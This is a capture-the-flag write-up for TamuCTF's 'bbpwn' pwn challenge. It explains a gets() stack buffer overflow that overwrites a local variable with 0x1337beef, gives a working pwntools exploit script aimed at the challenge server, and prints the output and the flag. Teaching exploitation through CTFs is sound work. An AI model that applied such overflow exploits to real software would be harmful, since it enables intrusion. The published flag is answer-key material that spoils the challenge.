## bbpwn 

* **CTF:** Tamu CTF
* **Category:** pwn
* **Points:** 50
* **Author(s):** b0uldrr

---

### Challenge
```
Welcome to pwnland!
nc challenges.tamuctf.com 4252
```
### Downloads
* [bbpwn](bbpwn)

---

### Solution

Running the provided binary, we are prompted to enter a string. I entered a test string and the program replied that my string was lame and exited.

```
$ nc challenges.tamuctf.com 4252
Enter a string: hello

The string "hello" is lame.
```

I opened the binary in Ghidra and examined the main function:

![main](images/main.png)

This function:
1. Sets a stack canary
1. Initialises a local variable (local_18) to equal 0
1. Prompts us for our input string using gets() and stores it in local_38, which was initialised with a buffer size of 32 bytes
1. Checks the value of local_18 and if it equals 0x1337beef, then it calls the readflag() function
1. Checks the stack canary

Although there is no conventional way to change the value of local_18 to pass the if gate, we can overflow the `local_38` buffer using the vulnerable `gets()` and then overwrite the value of `local_18` (which is above it on the stack) to set it to equal 0x1337beef.

I wrote a script to do this in python:

```
#! /usr/bin/python3

import pwn

local = False

if local == True:
    conn = pwn.process("./bbpwn")
else:
    conn = pwn.remote("challenges.tamuctf.com", 4252)

payload  = b"A" * 32		# Fill up the buffer of local_38
payload += pwn.p32(0x1337beef)  # Overwrite the value of local_18

print(conn.recvuntil("string:"))
conn.sendline(payload)
print(conn.recvall())
```

And the result...
```
$ ./soln.py 
[+] Opening connection to challenges.tamuctf.com on port 4252: Done
b'Enter a string:'
[+] Receiving all data: Done (95B)
[*] Closed connection to challenges.tamuctf.com port 4252
b' Congratulations. Your string is not lame. Here you go: gigem{0per4tion_skuld_74757474757275}\n\n'
```

---

### Flag 
```
gigem{0per4tion_skuld_74757474757275}
```
